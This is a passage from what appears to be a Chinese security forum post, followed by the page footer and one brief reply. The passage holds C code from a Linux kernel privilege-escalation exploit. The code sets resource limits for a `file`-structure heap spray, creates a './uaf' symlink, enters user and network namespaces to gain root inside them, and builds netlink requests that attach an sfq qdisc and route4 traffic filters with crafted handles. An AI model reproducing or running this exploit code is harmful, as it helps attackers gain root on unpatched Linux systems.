    return false;
}
// use_temporary_dir() —— recreate ./exp_dir with the empty files `data` and `data2`,
// make it the working directory and add the symlink ./uaf -> ./data.
// Exits with status 1 when chmod() or chdir() fails; the results of system() and
// symlink() are not checked.
static void use_temporary_dir(void) {
    const char* workdir = "exp_dir";

    system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data");
    system("touch exp_dir/data2");

    // chdir() is only attempted when chmod() succeeded
    if (chmod(workdir, 0777) != 0 || chdir(workdir) != 0)
        exit(1);

    symlink("./data", "./uaf");
}
// setup process memory
static void adjust_rlimit() {
    struct rlimit rlim;
    rlim.rlim_cur = rlim.rlim_max = (200 << 20);
    setrlimit(RLIMIT_AS, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 32 << 20;
    setrlimit(RLIMIT_MEMLOCK, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 136 << 20;
    // setrlimit(RLIMIT_FSIZE, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 1 << 20;
    setrlimit(RLIMIT_STACK, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 0;
    setrlimit(RLIMIT_CORE, &rlim);
    // RLIMIT_FILE
    rlim.rlim_cur = rlim.rlim_max = 14096;
    if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) {  // RLIMIT_NOFILE 最大打开文件描述符限制,默认为 1024, 需设置为 14096, 便于喷射 `file` 结构
        rlim.rlim_cur = rlim.rlim_max = 4096;
        spray_num_1 = 1200;
        spray_num_2 = 2800;
        if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) {
            perror("[-] setrlimit");
            err(1, "[-] setrlimit");
        }
    }
}
 
// setup_namespace() —— move the calling process into a new user namespace and a new
// network namespace, then map the caller's real uid and gid to id 0 inside it.
//
// The ids are read before unshare(). /proc/self/setgroups is set to "deny" before
// gid_map is written. Any failing step prints the reason and terminates the process.
void setup_namespace() {
    int real_uid = getuid();
    int real_gid = getgid();

    if (unshare(CLONE_NEWUSER) != 0) {
        perror("[-] unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }

    if (unshare(CLONE_NEWNET) != 0) {
        perror("[-] unshare(CLONE_NEWNET)");
        exit(EXIT_FAILURE);
    }

    if (!write_file("/proc/self/setgroups", "deny")) {
        perror("[-] write_file(/proc/self/setgroups)");
        exit(EXIT_FAILURE);
    }
    // map line format: <id inside> <id outside> <count>
    if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) {
        perror("[-] write_file(/proc/self/uid_map)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
        perror("[-] write_file(/proc/self/gid_map)");
        exit(EXIT_FAILURE);
    }
}
 
// pre_exploit() —— one-time preparation of the exploit process, in this order:
// resource limits (adjust_rlimit), working directory (use_temporary_dir),
// user/network namespace (setup_namespace).
void pre_exploit() {
    adjust_rlimit();
    use_temporary_dir();
    setup_namespace();
}
 
// NLMSG_TAIL(nmsg): address just past the current (aligned) end of netlink message
// `nmsg`, typed as the struct rtattr that would be appended next.
#define NLMSG_TAIL(nmsg) \
  ((struct rtattr *)(((char *)(nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))
// addattr() —— write one rtattr (header + payload) at `attr`
//
// attr : destination; no bound is checked, the caller must provide enough room
// type : value stored in rta_type
// data : payload, copied only when len is non-zero
// len  : payload length in bytes
// returns RTA_LENGTH(len), i.e. the unpadded attribute length that was stored in rta_len
int addattr(char* attr, int type, void* data, int len) {
    const int total = RTA_LENGTH(len);
    struct rtattr* hdr = (struct rtattr*)attr;

    hdr->rta_len = total;
    hdr->rta_type = type;
    if (len != 0)
        memcpy(RTA_DATA(hdr), data, len);

    return total;
}
// addattr_l() —— append one attribute to netlink message `n`, refusing to grow it past maxlen
//
// n      : message under construction; nlmsg_len is advanced on success
// maxlen : size limit for the whole message in bytes
// type   : value stored in rta_type
// data   : payload; may be NULL only when alen is 0
// alen   : payload length in bytes, must not be negative
// returns 0 on success, -1 (message unchanged, reason on stderr) otherwise
int addattr_l(struct nlmsghdr* n, int maxlen, int type, const void* data, int alen) {
    // a negative length would reach memcpy() as a huge size_t
    if (alen < 0 || (alen > 0 && data == NULL)) {
        fprintf(stderr, "addattr_l ERROR: invalid payload (length %d)\n", alen);
        return -1;
    }

    int len = RTA_LENGTH(alen);
    unsigned int start = NLMSG_ALIGN(n->nlmsg_len);
    unsigned int new_end = start + RTA_ALIGN(len);

    if (maxlen < 0 || new_end > (unsigned int)maxlen) {
        fprintf(stderr, "addattr_l ERROR: message exceeded bound of %d\n", maxlen);
        return -1;
    }

    // aligned end of the message: the address NLMSG_TAIL(n) denotes, computed with char* arithmetic
    struct rtattr* rta = (struct rtattr*)((char*)n + start);
    rta->rta_type = type;
    rta->rta_len = len;
    if (alen)
        memcpy(RTA_DATA(rta), data, alen);
    n->nlmsg_len = new_end;
    return 0;
}
 
// addattr_nest() —— open a nested attribute of the given type in message `n`
// Appends an empty attribute via addattr_l() and returns a pointer to it; the result of
// addattr_l() is not checked. Close the nest with addattr_nest_end().
struct rtattr* addattr_nest(struct nlmsghdr* n, int maxlen, int type) {
    // remember where the nest header goes before addattr_l() moves the tail
    struct rtattr* opened = NLMSG_TAIL(n);

    (void)addattr_l(n, maxlen, type, NULL, 0);
    return opened;
}
 
// addattr_nest_end() —— close a nest opened with addattr_nest()
// Sets nest->rta_len to the distance from the nest header to the current message tail
// and returns the current nlmsg_len.
int addattr_nest_end(struct nlmsghdr* n, struct rtattr* nest) {
    char* tail = (char*)NLMSG_TAIL(n);
    char* head = (char*)nest;

    nest->rta_len = tail - head;
    return n->nlmsg_len;
}
// add_qdisc() —— send an RTM_NEWQDISC request that attaches an "sfq" root qdisc to
// interface index 1
//
// fd : netlink socket to send the request on
// returns the result of sendmsg() (bytes sent, or -1 with errno set), or -1 when the
// request buffer could not be allocated. No reply is read.
int add_qdisc(int fd) {
    char* start = calloc(1, 0x1000);
    if (start == NULL) {
        perror("[-] calloc");
        return -1;
    }
    struct nlmsghdr* msg = (struct nlmsghdr*)start;

    // new qdisc                                          nlmsghdr + tcmsg
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE;
    msg->nlmsg_type = RTM_NEWQDISC;
    struct tcmsg* t = (struct tcmsg*)NLMSG_DATA(msg);
    // set local
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_parent = TC_H_ROOT;
    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);

    // NOTE(review): the original remark says sfq is not enabled in every kernel
    // configuration (qfq being the alternative) — confirm for the target kernel.
    addattr_l(msg, 0x1000, TCA_KIND, "sfq", 4);
    // print_hex(msg, msg->nlmsg_len);

    struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    int sent = sendmsg(fd, &msgh, 0);
    int saved = errno;      // keep sendmsg()'s errno for the caller
    free(start);            // the request buffer is not needed after the send
    errno = saved;
    return sent;
}
// add_tc_() —— send one RTM_NEWTFILTER request of kind "route" with caller-chosen flags
//
// fd     : netlink socket to send the request on
// from   : value of the TCA_ROUTE4_FROM attribute
// to     : value of the TCA_ROUTE4_TO attribute
// handle : value stored in tcm_handle
// flags  : netlink flags OR-ed with NLM_F_REQUEST (e.g. NLM_F_CREATE, NLM_F_EXCL)
// returns 1 once the request has been handed to sendmsg() (its result is not inspected,
// no reply is read), or 0 when the request buffer could not be allocated
int add_tc_(int fd, u_int32_t from, u_int32_t to, u_int32_t handle, u_int16_t flags) {
    char* start = calloc(1, 0x2000);
    if (start == NULL) {
        perror("[-] calloc");
        return 0;
    }
    // The request starts at the beginning of the zeroed buffer.
    struct nlmsghdr* msg = (struct nlmsghdr*)start;

    // new filter
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | flags;
    msg->nlmsg_type = RTM_NEWTFILTER;
    struct tcmsg* t = (struct tcmsg*)NLMSG_DATA(msg);

    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_handle = handle;

    addattr_l(msg, 0x1000, TCA_KIND, "route", 6);
    struct rtattr* tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
    addattr_l(msg, 0x1000, TCA_ROUTE4_FROM, &from, 4);
    addattr_l(msg, 0x1000, TCA_ROUTE4_TO, &to, 4);
    addattr_nest_end(msg, tail);

    // packing
    struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    sendmsg(fd, &msgh, 0);
    free(start);
    return 1;
}
 
// add_tc() —— convenience wrapper around add_tc_(): FROM is 0, TO is `handle`, and the
// filter handle passed on is (handle << 8) + handle.
void add_tc(int sockfd, uint32_t handle, uint16_t flag) {
    const uint32_t from = 0;
    const uint32_t filter_handle = (handle << 8) + handle;

    add_tc_(sockfd, from, handle, filter_handle, flag);
}
 
// calc_handle() —— combine a FROM / TO pair into one 32-bit handle
//
// from, to : each must be <= 0xff (enforced with assert)
// returns (from << 16) | to, or 0 when that value is 0, has bit 0x8000 set, or would
// change when its own 0x7f00 bits are OR-ed back in
uint32_t calc_handle(uint32_t from, uint32_t to) {
    assert(from <= 0xff && to <= 0xff);

    const uint32_t combined = (from << 16) | to;
    const uint32_t with_prio_bits = (combined & 0x7f00) | combined;

    if (with_prio_bits != combined || combined == 0 || (combined & 0x8000) != 0)
        return 0;

    return combined;
}
 

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2024-3-21 18:55 被Arahat0编辑 ,原因:
收藏
免费 12
支持
分享
最新回复 (1)
雪    币: 3070
活跃值: (30876)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
感谢分享
2024-3-2 23:23
1
游客
登录 | 注册 方可回帖
返回
//